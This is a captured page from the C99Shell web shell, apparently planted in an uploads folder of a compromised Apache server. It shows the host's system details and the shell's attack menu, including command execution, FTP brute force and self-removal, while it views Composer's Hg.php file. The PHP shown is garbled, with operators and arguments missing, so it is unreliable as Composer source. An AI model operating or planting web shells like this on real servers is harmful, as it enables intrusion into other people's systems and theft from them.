!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/composer/composer/src/Composer/Util/   drwxr-xr-x
Free 13.25 GB of 57.97 GB (22.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Hg.php (3 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of Composer.
 *
 * (c) Nils Adermann <naderman@naderman.de>
 *     Jordi Boggiano <j.boggiano@seld.be>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Composer\Util;

use 
Composer\Config;
use 
Composer\IO\IOInterface;

/**
 * @author Jonas Renaudot <jonas.renaudot@gmail.com>
 */
class Hg
{
    private static 
$version false;

    
/**
     * @var \Composer\IO\IOInterface
     */
    
private $io;

    
/**
     * @var \Composer\Config
     */
    
private $config;

    
/**
     * @var \Composer\Util\ProcessExecutor
     */
    
private $process;

    public function 
__construct(IOInterface $ioConfig $configProcessExecutor $process)
    {
        
$this->io $io;
        
$this->config $config;
        
$this->process $process;
    }

    public function 
runCommand($commandCallable$url$cwd)
    {
        
$this->config->prohibitUrlByConfig($url$this->io);

        
// Try as is
        
$command call_user_func($commandCallable$url);

        if (
=== $this->process->execute($command$ignoredOutput$cwd)) {
            return;
        }

        
// Try with the authentication information available
        
if (preg_match('{^(https?)://((.+)(?:\:(.+))?@)?([^/]+)(/.*)?}mi'$url$match) && $this->io->hasAuthentication($match[5])) {
            
$auth $this->io->getAuthentication($match[5]);
            
$authenticatedUrl $match[1] . '://' rawurlencode($auth['username']) . ':' rawurlencode($auth['password']) . '@' $match[5] . (!empty($match[6]) ? $match[6] : null);

            
$command call_user_func($commandCallable$authenticatedUrl);

            if (
=== $this->process->execute($command$ignoredOutput$cwd)) {
                return;
            }

            
$error $this->process->getErrorOutput();
        } else {
            
$error 'The given URL (' $url ') does not match the required format (http(s)://(username:password@)example.com/path-to-repository)';
        }

        
$this->throwException('Failed to clone ' $url ', ' "\n\n" $error$url);
    }

    private function 
throwException($message$url)
    {
        if (
null === self::getVersion($this->process)) {
            throw new 
\RuntimeException(Url::sanitize('Failed to clone ' $url ', hg was not found, check that it is installed and in your PATH env.' "\n\n" $this->process->getErrorOutput()));
        }

        throw new 
\RuntimeException(Url::sanitize($message));
    }

    
/**
     * Retrieves the current hg version.
     *
     * @return string|null The hg version number, if present.
     */
    
public static function getVersion(ProcessExecutor $process)
    {
        if (
false === self::$version) {
            
self::$version null;
            if (
=== $process->execute('hg --version'$output) && preg_match('/^.+? (\d+(?:\.\d+)+)\)?\r?\n/'$output$matches)) {
                
self::$version $matches[1];
            }
        }

        return 
self::$version;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--